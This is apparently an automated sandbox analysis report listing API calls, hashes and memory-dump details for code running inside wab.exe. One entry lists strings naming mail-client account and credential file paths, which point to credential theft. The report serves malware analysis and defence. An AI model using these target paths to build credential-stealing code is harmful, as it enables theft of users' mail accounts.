                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1454806937-0
                                                                                                                • Opcode ID: 60e71535fdf481acb733f1caddc5e01549af2c7d4bc8189ef261ca7c69efb19f
                                                                                                                • Instruction ID: 12c16975d3947802e944e985d6fdf12afa483eab5103f7266f7354fbf825ec00
                                                                                                                • Opcode Fuzzy Hash: 60e71535fdf481acb733f1caddc5e01549af2c7d4bc8189ef261ca7c69efb19f
                                                                                                                • Instruction Fuzzy Hash: 832135B194131CBFD711ABA48D8DEFB77ACEB58354F000A65FA11E2144D6B49E458BB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22C99C07,?,00000000,?,00000000,00000000), ref: 22C994D4
                                                                                                                • __fassign.LIBCMT ref: 22C9954F
                                                                                                                • __fassign.LIBCMT ref: 22C9956A
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22C99590
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,22C99C07,00000000,?,?,?,?,?,?,?,?,?,22C99C07,?), ref: 22C995AF
                                                                                                                • WriteFile.KERNEL32(?,?,?,22C99C07,00000000,?,?,?,?,?,?,?,?,?,22C99C07,?), ref: 22C995E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
                                                                                                                • Opcode ID: 405262ef2a85d0a9729164755d7412fc8516014026b03005dd62526d2fe81b56
                                                                                                                • Instruction ID: a65c59bd6d17e20fc13249a16bbe185c29c4ba2239f1e62d8ca965e99497c39f
                                                                                                                • Opcode Fuzzy Hash: 405262ef2a85d0a9729164755d7412fc8516014026b03005dd62526d2fe81b56
                                                                                                                • Instruction Fuzzy Hash: 3E51D3B1D00349AFDB14CFA8C895AFEBBF9EF49310F14465AE951E7281D730AA41CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 22C9339B
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 22C933A3
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 22C93431
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 22C9345C
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 22C934B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                • Opcode ID: dd2af1f83d56ab55fead3aa865ea3003438f2536e1f001de85fc730084c4cbe8
                                                                                                                • Instruction ID: bd5f20d04e22b218bc8ba3605891b8ad58eb2d7b40f4dd8bc4346362da8ef3b6
                                                                                                                • Opcode Fuzzy Hash: dd2af1f83d56ab55fead3aa865ea3003438f2536e1f001de85fc730084c4cbe8
                                                                                                                • Instruction Fuzzy Hash: DF41B634E00348ABCF01DF68C984AAEBFB5BF86328F118155E915AF391D735EA15CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 22C99221: _free.LIBCMT ref: 22C9924A
                                                                                                                • _free.LIBCMT ref: 22C992AB
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C992B6
                                                                                                                • _free.LIBCMT ref: 22C992C1
                                                                                                                • _free.LIBCMT ref: 22C99315
                                                                                                                • _free.LIBCMT ref: 22C99320
                                                                                                                • _free.LIBCMT ref: 22C9932B
                                                                                                                • _free.LIBCMT ref: 22C99336
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                • Instruction ID: 42d6a43063d2bf134326a21a0808d49726565acf2f75657585597c4ca0016fbe
                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                • Instruction Fuzzy Hash: B9119031550F48FADB38ABF0DC45FEF7B9DAF24700F400824A699B6092DA35B6448752
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22C96FFD,00000000,?,?,?,22C98A72,?,?,00000100), ref: 22C9887B
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22C98A72,?,?,00000100,5EFC4D8B,?,?), ref: 22C98901
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 22C989FB
                                                                                                                • __freea.LIBCMT ref: 22C98A08
                                                                                                                  • Part of subcall function 22C956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22C95702
                                                                                                                • __freea.LIBCMT ref: 22C98A11
                                                                                                                • __freea.LIBCMT ref: 22C98A36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: c49044fd0b9547335a76aecbac5ee6f70228dc34b2e6b137513421d0912dfff1
                                                                                                                • Instruction ID: 2cd8d2b3c7236099c13787eec63bb3e61943969f033cf6e166ce18949977470a
                                                                                                                • Opcode Fuzzy Hash: c49044fd0b9547335a76aecbac5ee6f70228dc34b2e6b137513421d0912dfff1
                                                                                                                • Instruction Fuzzy Hash: 3751CC72614306AAEB158F60CD85EBB37AAEF81764F514728FD04EB180EB35EC50C6A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _strlen.LIBCMT ref: 22C91607
                                                                                                                • _strcat.LIBCMT ref: 22C9161D
                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,22C9190E,?,?,00000000,?,00000000), ref: 22C91643
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C9165A
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,22C9190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22C91661
                                                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 22C91686
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922816806-0
                                                                                                                • Opcode ID: 9ff6ed906e0562598ff1e0975f64fbb66eea5d248902263ba8685969266a5c31
                                                                                                                • Instruction ID: 32c14194c50aaed30dcd27c168d2306a1ea62cddf014cb2ff2b127df65ef4407
                                                                                                                • Opcode Fuzzy Hash: 9ff6ed906e0562598ff1e0975f64fbb66eea5d248902263ba8685969266a5c31
                                                                                                                • Instruction Fuzzy Hash: 8D21D736900304ABDB14DF64DC85EFE77B8EF88710F24441AE904EB285DB74A641D7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C91038
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22C9104B
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22C91061
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22C91075
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22C91090
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 22C910B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 3594823470-0
                                                                                                                • Opcode ID: 119ec2fbb9d8f14a547f9ee784732731d2d7ed4c95a786034eea304cc5825f3c
                                                                                                                • Instruction ID: c9eb495a57e54248ed21bf155e35a4636712b995c5df8516995e03559ad13758
                                                                                                                • Opcode Fuzzy Hash: 119ec2fbb9d8f14a547f9ee784732731d2d7ed4c95a786034eea304cc5825f3c
                                                                                                                • Instruction Fuzzy Hash: 28218E35900318ABCF20DB60DD4DEEF376CEF84324F104696E959A72B1DAB19A85CF80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,22C93518,22C923F1,22C91F17), ref: 22C93864
                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22C93872
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 22C9388B
                                                                                                                • SetLastError.KERNEL32(00000000,?,22C93518,22C923F1,22C91F17), ref: 22C938DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852720340-0
                                                                                                                • Opcode ID: 61edd382966506b7a397d849d688a34e8bb8a7341b1c3d04ef4b968856c1e9dd
                                                                                                                • Instruction ID: 67f48fa733cc327bf54b65ee3f6235d6d0520ef6ad57ecae3c7dbe449c20aae9
                                                                                                                • Opcode Fuzzy Hash: 61edd382966506b7a397d849d688a34e8bb8a7341b1c3d04ef4b968856c1e9dd
                                                                                                                • Instruction Fuzzy Hash: BA01D832A497116DA2012BB96D89A3A6B95DF55774B20032BEA209F0D5EF154801838C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,22C96C6C), ref: 22C95AFA
                                                                                                                • _free.LIBCMT ref: 22C95B2D
                                                                                                                • _free.LIBCMT ref: 22C95B55
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,22C96C6C), ref: 22C95B62
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,22C96C6C), ref: 22C95B6E
                                                                                                                • _abort.LIBCMT ref: 22C95B74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                • Opcode ID: aed449e83962a5453e6928dcacc430732bb529a7c8998935684115997bedc446
                                                                                                                • Instruction ID: f777a71e032857da221b1ce5b3757a0b7f8c508bddff3cbd439e783082519d1e
                                                                                                                • Opcode Fuzzy Hash: aed449e83962a5453e6928dcacc430732bb529a7c8998935684115997bedc446
                                                                                                                • Instruction Fuzzy Hash: F8F0F6B6585700ABD30227346D4DF3E2B6A9FE1BF1F250624FD14A71C5FE398A0382A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 22C91E89: lstrlenW.KERNEL32(?,?,?,?,?,22C910DF,?,?,?,00000000), ref: 22C91E9A
                                                                                                                  • Part of subcall function 22C91E89: lstrcatW.KERNEL32(?,?), ref: 22C91EAC
                                                                                                                  • Part of subcall function 22C91E89: lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EB3
                                                                                                                  • Part of subcall function 22C91E89: lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EC8
                                                                                                                  • Part of subcall function 22C91E89: lstrcatW.KERNEL32(?,22C910DF), ref: 22C91ED3
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 22C9122A
                                                                                                                  • Part of subcall function 22C9173A: _strlen.LIBCMT ref: 22C91855
                                                                                                                  • Part of subcall function 22C9173A: _strlen.LIBCMT ref: 22C91869
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                • Opcode ID: 22c7ae009b3d5bfca53dbdf63b116ed1f642509acb9adb6f4a5e02b671f6a9c9
                                                                                                                • Instruction ID: 67d89948236555e39a4f481abe40a1abeb97726b23786cc3360298188ff82b18
                                                                                                                • Opcode Fuzzy Hash: 22c7ae009b3d5bfca53dbdf63b116ed1f642509acb9adb6f4a5e02b671f6a9c9
                                                                                                                • Instruction Fuzzy Hash: 6921D2B9E103486AEB109BA4EC92FFE7339EF80714F001556F604EB2E4E6F11E808759
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22C94AEA,?,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000), ref: 22C94B59
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22C94B6C
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,22C94AEA,?,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000,?,22C92082), ref: 22C94B8F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 5235cb1f5712b2ad441ad124db03136b9279dd43a4abc172e3352a894dcd2b9c
                                                                                                                • Instruction ID: a7a78b0801f6c2d68f04068ff10b33d68f8b6bcb10b7541a46671240b32046f9
                                                                                                                • Opcode Fuzzy Hash: 5235cb1f5712b2ad441ad124db03136b9279dd43a4abc172e3352a894dcd2b9c
                                                                                                                • Instruction Fuzzy Hash: F5F04F35A40308BBDB11AF90C90DFBDBFB9EF44365F0042A5F905B7254DB35A941CA91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 22C9715C
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 22C9717F
                                                                                                                  • Part of subcall function 22C956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22C95702
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 22C971A5
                                                                                                                • _free.LIBCMT ref: 22C971B8
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 22C971C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 336800556-0
                                                                                                                • Opcode ID: da80991b6042edf87893061b9e56bd5ffa31f9175fb226f1d641aca73a36749b
                                                                                                                • Instruction ID: 620e2e24ab880374036c592bf881c74d8daa0380e566505d894211ad0bdaee6b
                                                                                                                • Opcode Fuzzy Hash: da80991b6042edf87893061b9e56bd5ffa31f9175fb226f1d641aca73a36749b
                                                                                                                • Instruction Fuzzy Hash: 1001F7B26033157F27111AB64D8CCBB2A6DDFC2AA43140A39FD08E720CEE649C0689F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,22C9636D,22C95713,00000000,?,22C92249,?,?,22C91D66,00000000,?,?,00000000), ref: 22C95B7F
                                                                                                                • _free.LIBCMT ref: 22C95BB4
                                                                                                                • _free.LIBCMT ref: 22C95BDB
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C95BE8
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C95BF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,22C910DF,?,?,?,00000000), ref: 22C91E9A
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C91EAC
                                                                                                                • lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EB3
                                                                                                                • lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EC8
                                                                                                                • lstrcatW.KERNEL32(?,22C910DF), ref: 22C91ED3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 493641738-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C991D0
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C991E2
                                                                                                                • _free.LIBCMT ref: 22C991F4
                                                                                                                • _free.LIBCMT ref: 22C99206
                                                                                                                • _free.LIBCMT ref: 22C99218
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C9536F
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C95381
                                                                                                                • _free.LIBCMT ref: 22C95394
                                                                                                                • _free.LIBCMT ref: 22C953A5
                                                                                                                • _free.LIBCMT ref: 22C953B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22C94C1D
                                                                                                                • _free.LIBCMT ref: 22C94CE8
                                                                                                                • _free.LIBCMT ref: 22C94CF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$FileModuleName
                                                                                                                • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                                                                                • API String ID: 2506810119-3377118234
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22C96FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22C98731
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 22C987BA
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 22C987CC
                                                                                                                • __freea.LIBCMT ref: 22C987D5
                                                                                                                  • Part of subcall function 22C956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22C95702
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22C91D66,00000000,00000000,?,22C95C88,22C91D66,00000000,00000000,00000000,?,22C95E85,00000006,FlsSetValue), ref: 22C95D13
                                                                                                                • GetLastError.KERNEL32(?,22C95C88,22C91D66,00000000,00000000,00000000,?,22C95E85,00000006,FlsSetValue,22C9E190,FlsSetValue,00000000,00000364,?,22C95BC8), ref: 22C95D1F
